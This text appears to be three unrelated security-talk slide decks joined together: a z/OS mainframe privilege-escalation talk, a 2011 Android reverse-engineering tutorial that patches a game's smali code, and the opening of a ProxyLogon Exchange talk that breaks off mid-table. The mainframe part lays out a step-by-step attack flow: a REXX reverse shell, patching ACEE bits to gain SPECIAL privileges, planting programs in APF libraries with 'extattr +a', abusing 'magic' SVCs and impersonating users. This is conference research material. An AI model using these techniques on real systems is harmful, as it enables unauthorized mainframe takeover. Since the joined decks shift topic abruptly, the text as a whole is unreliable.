If we manage to “exit” the application, we can instruct CICS to
execute default admin programs (CECI, CEMT, etc.) => rarely
secured
CICS: a middleware full of secrets
@ayoul3__
As usual, some API functions are particularly interesting!
CECI offers to execute CICS API functions
[DEMO SPOOLOPEN]
INTRDR = Internal Reader, is the equivalent of
/bin/bash. It executes anything it receives
The theory
@ayoul3__
The theory
@ayoul3__
The theory
@ayoul3__
Reverse shell in JCL & REXX
We allocate a new file (dataset)
Reverse shell in REXX – a Python-like scripting language
Execution of the file
[DEMO CICSPWN]
Quick recap on how to execute code on z/OS
Sniffing credentials
Good ol’ bruteforce
Go through the middleware
And many more (FTP, NJE, etc.)
Check out Phil & Chad’s talks !
LISTUSER command
Shell on z/OS, now what ?
There are three main security attributes on RACF :
•
Special : access any system resource
•
Operations : access all dataset regardless of RACF rules
•
Audit : access audit trails and manage logging classes
The most widespread security product on z/OS is RACF. It
performs authentication, access control, etc.
This talk
Why we should care about mainframes
Quick recap on how to execute code on z/OS
Playing with z/OS memory layout
Z architecture
Proprietary CPU (CISC – Big Endian)
Three addressing modes: 23, 31 & 64 bits.
Each instruction has many variants: memory-memory,
memory-register, register-register, register-immediate, etc.
16 general purpose registers (0 – 0xF) (+ 49 other registers)
The PSW register holds control flags and the address of the
next instruction
Security context in memory
z/OS memory is full of control blocks: data structures
describing the current state of the system
RACF stores the current user’s privileges in the ACEE control
block…We just need to find it!
Security context in memory
[Diagram: control-block chain to the ACEE]
PSA (always starts at virtual address 0)
  --PSAAOLD (offset 548)--> ASCB (Address Space Control Block)
  --ASCBASXB (offset 108)--> ASXB (Address Space Extension Block)
  --ASXBSENV (offset 200)--> ACEE
ACEE USER FLAGS (offset 38):
  1... .... SPECIAL
  ..1. .... OPERATIONS
  ...1 .... AUDITOR
If we patch byte 38 we're good to go!
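The patch the slide describes can be simulated on a plain buffer; the offset and bit masks come from the diagram above, while everything else (on a real system this must run authorized, with access to key-0 storage) is outside the sketch:

```python
ACEE_FLAGS_OFFSET = 38      # user-flags byte, per the control-block layout
SPECIAL    = 0b10000000     # 1... ....
OPERATIONS = 0b00100000     # ..1. ....
AUDITOR    = 0b00010000     # ...1 ....

def patch_acee(acee: bytearray) -> bytearray:
    """Simulate 'patch byte 38': OR the privilege bits into the user-flags
    byte of an ACEE image (here just a local buffer; on z/OS the real thing
    is done from an APF-authorized program)."""
    acee[ACEE_FLAGS_OFFSET] |= SPECIAL | OPERATIONS
    return acee

acee = bytearray(64)                 # fake ACEE, flags initially zero
patch_acee(acee)
print(hex(acee[ACEE_FLAGS_OFFSET]))  # 0xa0
```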
Program State Word (PSW)
ABEND S0C4, code 4: Protection exception.
Memory protection
Same concept of virtual memory and paging as in Intel (sorta)
Each page frame (4k) is allocated a 4-bit Storage key + Fetch
Protection bit at the CPU level
16 possible Storage key values
0 – 7 : system and middleware. 0 is the master key
8 : mostly for users
9 – 15 : used by programs that require virtual = real memory
Program State Word (PSW)
Bits 8-11: current protection key (8 in this case)
Next instruction
Control flags
Memory protection
                      Storage keys   Keys don't match   Keys don't match
                      match          & fetch bit ON     & fetch bit OFF
PSW key is zero       Full           Full               Full
PSW key is not zero   Full           None               Read
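The access matrix above boils down to a tiny decision function; a sketch:

```python
def storage_access(psw_key: int, storage_key: int, fetch_protect: bool) -> str:
    """Access granted for a storage reference, per the protection table:
    PSW key 0 always wins; matching keys give full access; otherwise the
    page's fetch-protection bit decides between no access and read-only."""
    if psw_key == 0:
        return "full"
    if psw_key == storage_key:
        return "full"
    return "none" if fetch_protect else "read"

print(storage_access(8, 0, True))   # none
print(storage_access(0, 8, True))   # full
```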
Problem state Vs Supervisor state
Some instructions are only available in Supervisor state (kernel
mode) :
•
Cross memory operations
•
Direct Storage Access
•
Changing storage keys
•
Exit routines
•
Listening/editing/filtering system events
•
Etc.
Program State Word (PSW)
Problem mode ~ User mode
Supervisor mode ~ Kernel mode
Bits 15-16: Problem mode is ON in this case (D = 1101)
Next instruction
Control flags
How do we get into Supervisor state
APF libraries are extensions of the z/OS kernel
Any program present in an APF library can request
supervisor mode
Obviously…these libraries are very well protected ! (irony)
APF hunting on OMVS (Unix)
Every z/OS has an embedded POSIX compliant UNIX running (for
FTP, HTTP, etc.)
APF files have extended attributes on OMVS (Unix)
List extended attributes : ls -E
Find APF files : find / -ext a
Add APF authorization : extattr +a file
As for setuid bit, if you alter an APF file it loses its extended attribute
APF hunting on OMVS (Unix)
[DEMO APF UNIX]
APF hunting on z/OS
APF libraries on z/OS are akin to directories. They do not lose their
APF attribute if we drop programs inside
They are a tad more complicated to enumerate. We need to dive
into memory
Control block to the rescue!
Hunting APF on z/OS... Diving into virtual memory
[Diagram: control-block chain to the APF table]
PSA (always starts at virtual address 0)
  --FLCCVT (offset 16)--> CVT (references all major structures)
  --(offset 140)--> ECVT (Extended CVT)
  --ECVTCSVT (offset 228)--> CSVT (Content Supervisor Table)
  --APFA (offset 12)--> APF table, with FIRST (offset 8) and LAST (offset 12)
  pointers to the chained APF entries
Demo ELV.APF LIST
[DEMO ELV.APF]
Patching ACEE
The attack flow
Write an ASM program to patch the curent security context
•
Locate the ACEE structure in memory
•
Patch the privilege bits in memory
Compile and link the program with the Authorized state
Copy it to an APF library with ALTER access
Run it and enjoy SPECIAL privileges
APF
@ayoul3__
[DEMO 2 ELV.APF]
The theory behind this feat is not new
Mark Wilson @ich408i discussed a similar abuse of privilege using
SVC
Some legitimate products/Mainframe admins use a variation of this
technique too!
Stu Henderson alluded to critical risks of having APF with ALTER
access
Supervisor Call
Supervisor Call ~ Syscalls on Linux: APIs to hand over control to
Supervisor mode
Table of 255 SVC. 0 to 200 are IBM reserved. 201 – 255 are user
defined
Some admins/products register an authorized SVC that switches
the AUTH bit and goes into Kernel mode
« Magic » SVC code
Call SVC to get into Supervisor mode
We do not need to launch
this program from an APF
library anymore
Looking for « magic » SVC
We browse the SVC table
looking for these
instructions (and other
possible variations)
Supervisor Call
[DEMO ELV.SVF]
Excerpts from the Logica attack
https://github.com/mainframed/logica/blob/master/Tfy.source.backdoor
A few problems though
The user’s attribute are modified => RACF rules are altered
You can be special, that does not mean you can access any app!
=> Need to figure out the right class/resource to add
RACF rules (not easy)
Impersonating users
Interesting stuff in the ACEE
ACEE fields: UserID, Group Name, User Flags, Privileged flag, Terminal information, Terminal ID, @ List of groups, ...
Duplicate these fields to our user's ACEE
Each program or JOB is allocated a virtual address space (same as
in Windows/Linux)
Private areas can only be addressed from within the address space
All addresses spaces share some common regions that contain
system data & code: PSA, CVT, etc.
Each address space is identified by a 2-byte number : ASID (~ PID
on Linux)
Not so fast…
Listing address spaces
[Diagram: control-block chain to the ASCB list]
PSA (always starts at virtual address 0)
  --FLCCVT (offset 16)--> CVT (references all major structures)
  --CVTASVT (offset 556)--> ASVT
ASVT: ASVTMAXU at offset 516; the first ASCB slot at offset 528,
then one slot every +16 bytes (1st ASCB, 2nd ASCB, ..., last ASCB)
ELV.SELF
List address spaces demo
[DEMO ELV.SELF]
Virtual address space layout
[Diagram: z/OS virtual address space layout; boundaries at 8K, 24K, 16 MB, 2 GB, 2 TB, 512 TB and 16 EB]
Marked regions: PSA, System region, User region, Private region, Common region, Extended Private, Extended Common, Shared Area, Low User Private. The ACEE sits in the private area of the address space.
Service Request Block: schedules a routine to run on a foreign
Virtual Address Space
Cross memory mode: allows read/write access in remote @ space
using special instructions
Access Register mode: 16-set of dedicated registers that can map
each a remote @ space
Cross memory operations
Cross memory operations
Cross memory operations
Cross memory operations
[DEMO 2 ELV.SELF]
• github.com/ayoul3
• ayoul3__
Practice of
Android Reverse Engineering
Jim Huang ( 黃敬群 )
Developer, 0xlab
[email protected]
July 23, 2011 / HITcon
Rights to copy
Attribution – ShareAlike 3.0
You are free
to copy, distribute, display, and perform the work
to make derivative works
to make commercial use of the work
Under the following conditions
Attribution. You must give the original author credit.
Share Alike. If you alter, transform, or build upon this work, you may distribute the
resulting work only under a license identical to this one.
For any reuse or distribution, you must make clear to others the license terms of this
work.
Any of these conditions can be waived if you get permission from the copyright holder.
Your fair use and other rights are in no way affected by the above.
License text: http://creativecommons.org/licenses/by-sa/3.0/legalcode
© Copyright 2011 0xlab
http://0xlab.org/
[email protected]
Corrections, suggestions, contributions and
translations are welcome!
Latest update: July 23, 2011
Myself
was a Kaffe Developer
Threaded Interpreter, JIT, AWT for
embedded system, robustness
was a GCJ (Java Frontend for GCC)
and GNU Classpath Developer
is an AOSP (Android Open Source
Project) contributor
30+ patches are merged officially
bionic libc, ARM optimizations
Not Only for Cracking
(1) Sometimes, it takes more __time__ than expected to obtain source code.
Taiwanese ODM →
(2) Post-optimizations over
existing Android applications
(3) “Borrow" something good
to produce "goods"
Background Knowledge
(and Thank you!)
• The Code Injection and Data Protection of Android,
Thinker Li @HITcon2011
• Reversing Android Malware,
Mahmud ab Rahman @HITcon2011
• My focus would be the practice.
– Hack Android applications for Beginners
Agenda
(1) Development Flow
(2) Reverse Practice
(3) Real world tasks
Android Application Development Flow
[Diagram: build pipeline]
Resources + Assets + Manifest --aapt--> packaged resource file (and generated R)
Source code + R --javac--> .class files --dx--> classes.dex (Dalvik bytecode)
Packaged resource file + classes.dex + libraries --apkbuilder -u--> unsigned apk
unsigned apk + key --jarsigner--> signed apk --adb--> publish or test
APK content
$ unzip Angry+Birds.apk
Archive: Angry+Birds.apk
...
inflating: AndroidManifest.xml
extracting: resources.arsc
extracting: res/drawable-hdpi/icon.png
extracting: res/drawable-ldpi/icon.png
extracting: res/drawable-mdpi/icon.png
inflating: classes.dex
inflating: lib/armeabi/libangrybirds.so
inflating: lib/armeabi-v7a/libangrybirds.so
inflating: META-INF/MANIFEST.MF
inflating: META-INF/CERT.SF
inflating: META-INF/CERT.RSA
Dalvik DEX
JNI
manifest +
signature
Name: classes.dex
SHA1-Digest: I9Vne//i/5Wyzs5HhBVu9dIoHDY=
Name: lib/armeabi/libangrybirds.so
SHA1-Digest: pSdb9FYauyfjDUxM8L6JDmQk4qQ=
AndroidManifest
$ file AndroidManifest.xml
AndroidManifest.xml: DBase 3 data file (2328 records)
$ apktool d ../AngryBirds/Angry+Birds.apk
I: Baksmaling...
I: Loading resource table...
...
I: Decoding fileresources...
I: Decoding values*/* XMLs...
I: Done.
I: Copying assets and libs...
$ file Angry+Birds/AndroidManifest.xml
Angry+Birds/AndroidManifest.xml: XML document text
Before performing reverse engineering, let's observe how the Android system works.
Android system works
Android Launcher
Android Launcher
Widget
Widget
How can Launcher find widgets/activities and invoke them?
How can Launcher find widgets/activities and invoke them?
In this presentation, Android platform 2.3.3 is selected.
When installing FrozenBubble.apk
$ adb logcat -c
$ adb install -r FrozenBubble.apk
1222 KB/s (499568 bytes in 0.399s)
pkg: /data/local/tmp/FrozenBubble.apk
Success
$ adb logcat
D/AndroidRuntime( 329):
D/AndroidRuntime( 329): >>>>>>
AndroidRuntime START
com.android.internal.os.RuntimeInit <<<<<<
D/PackageParser( 60): Scanning
package: /data/app/vmdl10628918.tmp
...
APK Installation Procedure
D/AndroidRuntime( 329):
D/AndroidRuntime( 329): >>>>>> AndroidRuntime START com.android.internal.os.RuntimeInit <<<<<<
D/PackageParser( 60): Scanning package: /data/app/vmdl10628918.tmp
I/PackageManager( 60): Removing non-system package:org.jfedor.frozenbubble
I/ActivityManager( 60): Force stopping package org.jfedor.frozenbubble uid=10034
D/PackageManager( 60): Scanning package org.jfedor.frozenbubble
I/PackageManager( 60): Package org.jfedor.frozenbubble codePath changed from
/data/app/org.jfedor.frozenbubble-2.apk to /data/app/org.jfedor.frozenbubble-1.apk; Retaining data and
using new
I/PackageManager( 60): Unpacking native libraries for /data/app/org.jfedor.frozenbubble-1.apk
D/installd( 34): DexInv: --- BEGIN '/data/app/org.jfedor.frozenbubble-1.apk' ---
D/dalvikvm( 340): DexOpt: load 54ms, verify+opt 137ms
D/installd( 34): DexInv: --- END '/data/app/org.jfedor.frozenbubble-1.apk' (success) ---
W/PackageManager( 60): Code path for pkg : org.jfedor.frozenbubble changing from
/data/app/org.jfedor.frozenbubble-2.apk to /data/app/org.jfedor.frozenbubble-1.apk
W/PackageManager( 60): Resource path for pkg : org.jfedor.frozenbubble changing from
/data/app/org.jfedor.frozenbubble-2.apk to /data/app/org.jfedor.frozenbubble-1.apk
D/PackageManager( 60): Activities: org.jfedor.frozenbubble.FrozenBubble
I/ActivityManager( 60): Force stopping package org.jfedor.frozenbubble uid=10034
I/installd( 34): move /data/dalvik-cache/data@[email protected]@classes.dex ->
/data/dalvik-cache/data@[email protected]@classes.dex
D/PackageManager( 60): New package installed in /data/app/org.jfedor.frozenbubble-1.apk
I/ActivityManager( 60): Force stopping package org.jfedor.frozenbubble uid=10034
I/installd( 34): unlink /data/dalvik-cache/data@[email protected]@classes.dex
D/AndroidRuntime( 329): Shutting down VM
D/jdwp ( 329): adbd disconnected
Android Runtime performs init
Package Manager detects APK and installs
DexOpt (verify and optimize all of the classes in the DEX file)
Activities: org.jfedor.frozenbubble.FrozenBubble
I/ActivityManager( 60): Start proc org.jfedor.frozenbubble for activity
org.jfedor.frozenbubble/.FrozenBubble: pid=356 uid=10034 gids={}
I/ActivityManager( 60): Displayed org.jfedor.frozenbubble/.FrozenBubble: +2s899ms
Execute FrozenBubble
from Android Launcher
$ adb shell am start \
-e debug true \
-a android.intent.action.MAIN \
-c android.intent.category.LAUNCHER \
-n org.jfedor.frozenbubble/.FrozenBubble
Starting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=org.jfedor.frozenbubble/.FrozenBubble (has extras) }
Execute FrozenBubble
$ adb shell dumpsys | grep -i bubble
name=org.jfedor.frozenbubble/org.jfedor.frozenbubble.FrozenBubble
Intent { act=android.intent.action.PACKAGE_ADDED
dat=package:org.jfedor.frozenbubble flg=0x10000000 (has
extras) }
* TaskRecord{40744ad0 #4 A org.jfedor.frozenbubble}
affinity=org.jfedor.frozenbubble
intent={act=android.intent.action.MAIN
cat=[android.intent.category.LAUNCHER] flg=0x10200000
cmp=org.jfedor.frozenbubble/.FrozenBubble}
realActivity=org.jfedor.frozenbubble/.FrozenBubble
...
ActivityManager
• Start new Activities and Services
• Fetch Content Providers
• Intent broadcasting
• OOM adj. Maintenance
• ANR (Application Not Responding)
• Permissions
• Task management
• Lifecycle management
ActivityManager
• starting new app from Launcher:
– onClick(Launcher)
– startActivity
– <Binder>
– ActivityManagerService
– startViaZygote(Process.java)
– <Socket>
– Zygote
Use JDB to Trace Android Application
#!/bin/bash
adb wait-for-device
adb shell am start \
-e debug true \
-a android.intent.action.MAIN \
-c android.intent.category.LAUNCHER \
-n org.jfedor.frozenbubble/.FrozenBubble &
debug_port=$(adb jdwp | tail -1);
adb forward tcp:29882 jdwp:$debug_port &
jdb -J-Duser.home=. -connect \
com.sun.jdi.SocketAttach:hostname=localhost,port=29882 &
JDWP: Java Debug Wire Protocol
In APK manifest, debuggable="true"
JDB usage
> threads
Group system:
(java.lang.Thread)0xc14050e388 <6> Compiler cond. Waiting
(java.lang.Thread)0xc14050e218 <4> Signal Catcher cond. waiting
(java.lang.Thread)0xc14050e170 <3> GC cond. waiting
(java.lang.Thread)0xc14050e0b8 <2> HeapWorker cond. waiting
Group main:
(java.lang.Thread)0xc14001f1a8 <1> main running
(org.jfedor.frozenbubble.GameView$GameThread)0xc14051e300
<11> Thread10 running
(java.lang.Thread)0xc14050f670 <10> SoundPool running
(java.lang.Thread)0xc14050f568 <9> SoundPoolThread running
(java.lang.Thread)0xc140511db8 <8> Binder Thread #2 running
(java.lang.Thread)0xc140510118 <7> Binder Thread #1 running
> suspend 0xc14051e300
> thread 0xc14051e300
<11> Thread-10[1] where
[1] android.view.SurfaceView$3.internalLockCanvas (SurfaceView.java:789)
[2] android.view.SurfaceView$3.lockCanvas (SurfaceView.java:745)
[3] org.jfedor.frozenbubble.GameView$GameThread.run (GameView.java:415)
DDMS = Dalvik Debug Monitor Server
(JDB)
> thread 0xc14051e300
<11> Thread-10[1] where
[1] android.view.SurfaceView$3.internalLockCanvas (SurfaceView.java:789)
[2] android.view.SurfaceView$3.lockCanvas (SurfaceView.java:745)
[3] org.jfedor.frozenbubble.GameView$GameThread.run (GameView.java:415)
hierarchyviewer: Traverse widgets
Figure out the association between APK resources and runtime behavior.
Decompile / Disassembly
• apktool: http://code.google.com/p/android-apktool/
• dex2jar: http://code.google.com/p/dex2jar/
• Jad / jd-gui: http://java.decompiler.free.fr/
smali : assembler/disassembler for Android's dex format
• http://code.google.com/p/smali/
• smali: The assembler
• baksmali: The disassembler
• Fully integrated in apktool
$ apktool d ../AngryBirds/Angry+Birds.apk
I: Baksmaling...
I: Loading resource table...
...
I: Decoding fileresources...
I: Decoding values*/* XMLs...
I: Done.
I: Copying assets and libs...
$ apktool d ../AngryBirds/Angry+Birds.apk
I: Baksmaling...
I: Loading resource table...
...
I: Decoding fileresources...
I: Decoding values*/* XMLs...
I: Done.
I: Copying assets and libs...
Java bytecode vs. Dalvik bytecode
(stack vs. register)
public int method( int i1, int i2 ) {
int i3 = i1 * i2;
return i3 * 2;
}
.method public method(II)I
iload_1
iload_2
imul
istore_3
iload_3
iconst_2
imul
ireturn
.end method
.var 0 is “this”
.var 1 is argument #1
.var 2 is argument #2
.method public method(II)I
mul-int v0, v2, v3
mul-int/lit8 v0, v0, 2
return v0
.end method
this: v1 (Ltest2;)
parameter[0] : v2 (I)
parameter[1] : v3 (I)
Java
Dalvik
Dalvik Register frames
• Dalvik registers behave more like local variables
• Each method has a fresh set of registers.
• Invoked methods don't affect the registers of
invoking methods.
Practice: Level Up
Change initial game level
From 1 to 5 !
Disassembly
$ mkdir workspace smalisrc
$ cd workspace
$ unzip ../FrozenBubble-orig.apk
Archive: ../FrozenBubble-orig.apk
inflating: META-INF/MANIFEST.MF
inflating: META-INF/CERT.SF
inflating: META-INF/CERT.RSA
inflating: AndroidManifest.xml
...
extracting: resources.arsc
$ bin/baksmali -o smalisrc workspace/classes.dex
Output
smalisrc$ find
./org/jfedor/frozenbubble/FrozenBubble.smali
./org/jfedor/frozenbubble/R$id.smali
./org/jfedor/frozenbubble/GameView.smali
./org/jfedor/frozenbubble/SoundManager.smali
./org/jfedor/frozenbubble/LaunchBubbleSprite.smali
./org/jfedor/frozenbubble/Compressor.smali
./org/jfedor/frozenbubble/R$attr.smali
./org/jfedor/frozenbubble/BubbleFont.smali
./org/jfedor/frozenbubble/PenguinSprite.smali
./org/jfedor/frozenbubble/GameView$GameThread.smali
./org/jfedor/frozenbubble/LevelManager.smali
./org/jfedor/frozenbubble/BubbleSprite.smali
./org/jfedor/frozenbubble/R$string.smali
...
Generated
from resources
org.jfedor.frozenbubble/.FrozenBubble
Output
smalisrc$ grep "\.method"
org/jfedor/frozenbubble/LevelManager.smali
.method public constructor <init>([BI)V
.method private getLevel(Ljava/lang/String;)[[B
.method public getCurrentLevel()[[B
.method public getLevelIndex()I
.method public goToFirstLevel()V
.method public goToNextLevel()V
.method public restoreState(Landroid/os/Bundle;)V
.method public saveState(Landroid/os/Bundle;)V
List the methods implemented in class LevelManager
Dalvik::Types
• Base types
– I : int / J : long / S : short
– Z : boolean
– D : double / F : float
– C : char
– V : void (when return value)
• Classes: Ljava/lang/Object;
• Arrays: [I, [Ljava/lang/Object;, [[I
.method private getLevel(Ljava/lang/String;)[[B
→ private byte[][] getLevel(String data)
.method public goToNextLevel()V
→ public void goToNextLevel();
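The descriptor rules above are mechanical enough to automate; a small converter sketch (the function name is mine):

```python
BASE_TYPES = {"I": "int", "J": "long", "S": "short", "Z": "boolean",
              "D": "double", "F": "float", "C": "char", "B": "byte",
              "V": "void"}

def demangle(desc: str) -> str:
    """Turn a Dalvik/JNI type descriptor into Java source syntax,
    e.g. '[[B' -> 'byte[][]' and 'Ljava/lang/String;' -> 'java.lang.String'."""
    dims = 0
    while desc.startswith("["):        # each leading '[' is one array dimension
        dims += 1
        desc = desc[1:]
    if desc.startswith("L") and desc.endswith(";"):
        java = desc[1:-1].replace("/", ".")
    else:
        java = BASE_TYPES[desc]
    return java + "[]" * dims

print(demangle("[[B"))                 # byte[][]
print(demangle("Ljava/lang/Object;"))  # java.lang.Object
```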
Dalvik::Methods
• Rich meta-information is assigned to Dalvik
methods
• Method meta-information:
– Signature
– Try-catch information
– Annotations
– Number of registers used
– Debug information
• Line numbers
• Local variable lifetime
Output
smalisrc$ grep -r goToFirstLevel *
org/jfedor/frozenbubble/GameView$GameThread.smali:
invoke-virtual {v2}, Lorg/jfedor/frozenbubble/LevelManager;->goToFirstLevel()V
org/jfedor/frozenbubble/LevelManager.smali:
.method public goToFirstLevel()V
Note that the first argument of the method invocation is "this", as this is a non-static method.
GameView$GameThread.smali
.method public newGame()V
. . .
move-object/from16 v0, p0
iget-object v0, v0, Lorg/jfedor/frozenbubble/GameView$GameThread;->mLevelManager:Lorg/jfedor/frozenbubble/LevelManager;
move-object v2, v0
invoke-virtual {v2}, Lorg/jfedor/frozenbubble/LevelManager;->goToFirstLevel()V
Equals to Java:
objLevelManager.goToFirstLevel();
LevelManager.smali
.method public goToFirstLevel()V
.registers 2
.prologue
.line 175
const/4 v0, 0x0
iput v0, p0, Lorg/jfedor/frozenbubble/LevelManager;->currentLevel:I
.line 176
return-void
.end method
Equals to Java:
currentLevel = 0;
Equals to Java:
public class LevelManager {
...
public void goToFirstLevel() {
currentLevel = 0;
}
...
}
Constants to registers: const/4, const/16, const, const/high16,
const-wide/16, const-wide/32, const-wide, const-wide/high16,
const-string, const-class
Modify constructor of
GameView::GameThread()
• Look up output in GameView$GameThread.smali
.class Lorg/jfedor/frozenbubble/GameView$GameThread;
.super Ljava/lang/Thread;
.annotation system Ldalvik/annotation/InnerClass;
accessFlags = 0x0
name = "GameThread"
.end annotation
# direct methods
.method public constructor <init>(Lorg/jfedor/frozenbubble/GameView;Landroid/view/SurfaceHolder;[BI)V
Modify constructor of
GameView::GameThread()
• Look up output in GameView$GameThread.smali
# direct methods
.method public constructor <init>(Lorg/jfedor/frozenbubble/GameView;Landroid/view/SurfaceHolder;[BI)V
Equals to Java:
class GameView ??? {
class GameThread extends Thread {
public GameThread(SurfaceHolder s,
byte[] b,
int I) {
GameView.smali
• Look up output in GameView.smali
.class Lorg/jfedor/frozenbubble/GameView;
.super Landroid/view/SurfaceView;
# interfaces
.implements Landroid/view/SurfaceHolder$Callback;
• Look up output in GameView$GameThread.smali
.class Lorg/jfedor/frozenbubble/GameView$GameThread;
.super Ljava/lang/Thread;
Equals to Java:
class GameView extends SurfaceView
implements SurfaceHolder.Callback {
class GameThread extends Thread {
Implementation of GameView::GameThread()
• Check GameView::public GameThread(SurfaceHolder s, byte[] b, int I)
const-string v3, "level"
const/4 v4, 0x0
move-object/from16 v0, v25
move-object v1, v3
move v2, v4
invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getInt(Ljava/lang/String;I)I
move-result p4
new-instance v3, Lorg/jfedor/frozenbubble/LevelManager;
move-object v0, v3
move-object/from16 v1, v22
move/from16 v2, p4
invoke-direct {v0, v1, v2}, Lorg/jfedor/frozenbubble/LevelManager;-><init>([BI)V
Invoke constructor of LevelManager
Register v1 related code
const-string v3, "level"
const/4 v4, 0x0
move-object/from16 v0, v25
move-object v1, v3
move v2, v4
invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getInt(Ljava/lang/String;I)I
move-result p4
new-instance v3, Lorg/jfedor/frozenbubble/LevelManager;
move-object v0, v3
move-object/from16 v1, v22
move/from16 v2, p4
invoke-direct {v0, v1, v2}, Lorg/jfedor/frozenbubble/LevelManager;-><init>([BI)V
Register v2 related code
const-string v3, "level"
const/4 v4, 0x0
move-object/from16 v0, v25
move-object v1, v3
move v2, v4
invoke-interface {v0, v1, v2},
    Landroid/content/SharedPreferences;->getInt(Ljava/lang/String;I)I
move-result p4
new-instance v3, Lorg/jfedor/frozenbubble/LevelManager;
move-object v0, v3
move-object/from16 v1, v22
move/from16 v2, p4
invoke-direct {v0, v1, v2},
    Lorg/jfedor/frozenbubble/LevelManager;-><init>([BI)V
“0x0” is passed to LevelManager's
constructor as parameter
Recall the grep results
smalisrc$ grep "\.method" org/jfedor/frozenbubble/LevelManager.smali
.method public constructor <init>([BI)V
.method private getLevel(Ljava/lang/String;)[[B
.method public getCurrentLevel()[[B
.method public getLevelIndex()I
.method public goToFirstLevel()V
.method public goToNextLevel()V
.method public restoreState(Landroid/os/Bundle;)V
.method public saveState(Landroid/os/Bundle;)V
Equals to Java:
public class LevelManager {
...
public LevelManager(byte[] b, int i)
Register v2 related code
const-string v3, "level"
const/4 v4, 0x0
move-object/from16 v0, v25
move-object v1, v3
move v2, v4
invoke-interface {v0, v1, v2},
    Landroid/content/SharedPreferences;->getInt(Ljava/lang/String;I)I
move-result p4
new-instance v3, Lorg/jfedor/frozenbubble/LevelManager;
move-object v0, v3
move-object/from16 v1, v22
move/from16 v2, p4
invoke-direct {v0, v1, v2},
    Lorg/jfedor/frozenbubble/LevelManager;-><init>([BI)V
p4 holds the result after the method invocation.
Therefore, v2 has the return value of method
android.content.SharedPreferences.getInt()
Modify!!!
• Check GameView::public GameThread(SurfaceHolder s, byte[] b, int I)
const-string v3, "level"
const/4 v4, 0x0
move-object/from16 v0, v25
move-object v1, v3
move v2, v4
invoke-interface {v0, v1, v2},
    Landroid/content/SharedPreferences;->getInt(Ljava/lang/String;I)I
move-result p4
new-instance v3, Lorg/jfedor/frozenbubble/LevelManager;
move-object v0, v3
move-object/from16 v1, v22
move/from16 v2, p4
invoke-direct {v0, v1, v2},
    Lorg/jfedor/frozenbubble/LevelManager;-><init>([BI)V
Remove!
Change value from 0x0 to 0x4
Real World Tasks
Tasks
• ODEX (Optimized DEX)
– platform-specific optimizations:
• specific bytecode
• vtables for methods
• offsets for attributes
• method inlining
• JNI
– JNIEnv
• Native Activity
• Key signing
DEX Optimizations
• Before execution, DEX files are optimized.
– Normally it happens before the first execution of code from the
DEX file
– Combined with the bytecode verification
– In case of DEX files from APKs, when the application is launched
for the first time.
• Process
– The dexopt process (which is actually a backdoor of Dalvik) loads
the DEX, replaces certain instructions with their optimized
counterparts
– Then writes the resulting optimized DEX (ODEX) file into the
/data/dalvik-cache directory
– It is assumed that the optimized DEX file will be executed on the
same VM that optimized it. ODEX files are NOT portable across
VMs.
dexopt: Instruction Rewritten
• Virtual (non-private, non-constructor, non-static methods)
invoke-virtual <symbolic method name> → invoke-virtual-quick <vtable index>
Before:
invoke-virtual
{v1,v2},java/lang/StringBuilder/append;append(Ljava/lang/String;)Ljava/lang/StringBuilder;
After:
invoke-virtual-quick {v1,v2},vtable #0x3b
• Frequently used methods
invoke-virtual/direct/static <symbolic method name> → execute-inline <method index>
– Before:
invoke-virtual {v2},java/lang/String/length
– After:
execute-inline {v2},inline #0x4
• instance fields: iget/iput <field name> → iget/iput <memory offset>
– Before: iget-object v3,v5,android/app/Activity.mComponent
– After: iget-object-quick v3,v5,[obj+0x28]
Meaning of DEX Optimizations
• Sets byte ordering and structure alignment
• Aligns the member variables to a 32-bit / 64-bit boundary (the
structures in the DEX/ODEX file itself are 32-bit aligned)
• Significant optimizations because of the elimination
of symbolic field/method lookup at runtime.
• Aid of Just-In-Time compiler
JNI specificities can ease reversing
•1- get the function signature in Java
•2- use IDA to generate a TIL file from jni.h
•3- assign the structure to the right variable
•4- see function calls directly
•5- do the same in Hex-Rays
Further Considerations
• Optimizing, Obfuscating, and Shrinking your Android Applications with ProGuard
  http://www.androidengineer.com/2010/07/optimizing-obfuscating-and-shrinking.html
• Missions:
– Obfuscation
– Optimizing
• ProGuard
<target name="-dex" depends="compile,optimize">
<target name="-post-compile">
<antcall target="optimize"/>
</target>
• Google's License Verification Library (LVL)
-keep class com.android.vending.licensing.ILicensingService
http://0xlab.org
ProxyLogon
is Just the Tip of the Iceberg
A New Attack Surface on Microsoft Exchange Server!
Orange Tsai
Orange Tsai
• Orange Tsai, focusing on Web and Application 0-day research
• Principal Security Researcher of DEVCORE
• Captain of HITCON CTF Team
• Speaker of Security Conferences
• Black Hat USA & ASIA / DEFCON / HITB / HITCON …
• Selected Awards and Honors:
• 2017 - 1st place of Top 10 Web Hacking Techniques
• 2018 - 1st place of Top 10 Web Hacking Techniques
• 2019 - Winner of Pwnie Awards "Best Server-Side Bug"
• 2021 - Champion and "Master of Pwn" of Pwn2Own
Disclaimer
All vulnerabilities disclosed today are reported responsibly and
patched by Microsoft
Why Target Exchange Server?
1.
Mail servers always keep confidential secrets and Exchange Server is
the most well-known mail solution for enterprises and governments
worldwide
2. Has been the target for Nation-sponsored hackers for a long time
(Equation Group😉)
3. More than 400,000 Exchange servers exposed on the Internet
according to our survey
Exchange Security in the Past Years
• Most bugs are based on known attack vectors but there are still
several notable bugs:
1.
EnglishmansDentist from Equation Group:
• Recap: The only practical and public pre-auth RCE in Exchange history. Unfortunately, the
arsenal only works on the ancient Exchange Server 2003
2.
CVE-2020-0688 Hardcoded MachineKey from anonymous working with ZDI:
• Recap: A classic .NET deserialization bug due to a hardcoded cryptography key. This is also a
hint that Microsoft Exchange lacks security reviews
Our Works
• We focus on the Exchange architecture and discover a new attack surface
that no one proposed before. That's why we can pop 0days easily!
• We discovered 8 vulnerabilities that covered server-side, client-side, and
crypto bugs through this new attack surface, and chained into 3 attacks:
1.
ProxyLogon: The most well-known pre-auth RCE chain
2.
ProxyOracle: A plaintext-password recovery attacking chain
3.
ProxyShell: The pre-auth RCE chain we demonstrated at Pwn2Own 2021
Vulnerabilities We Discovered
■ Vulnerability related to this new attack surface

Report Time  | Name                     | CVE            | Patch Time   | Reported by
Jan 05, 2021 | ProxyLogon               | CVE-2021-26855 | Mar 02, 2021 | Orange Tsai, Volexity and MSTIC
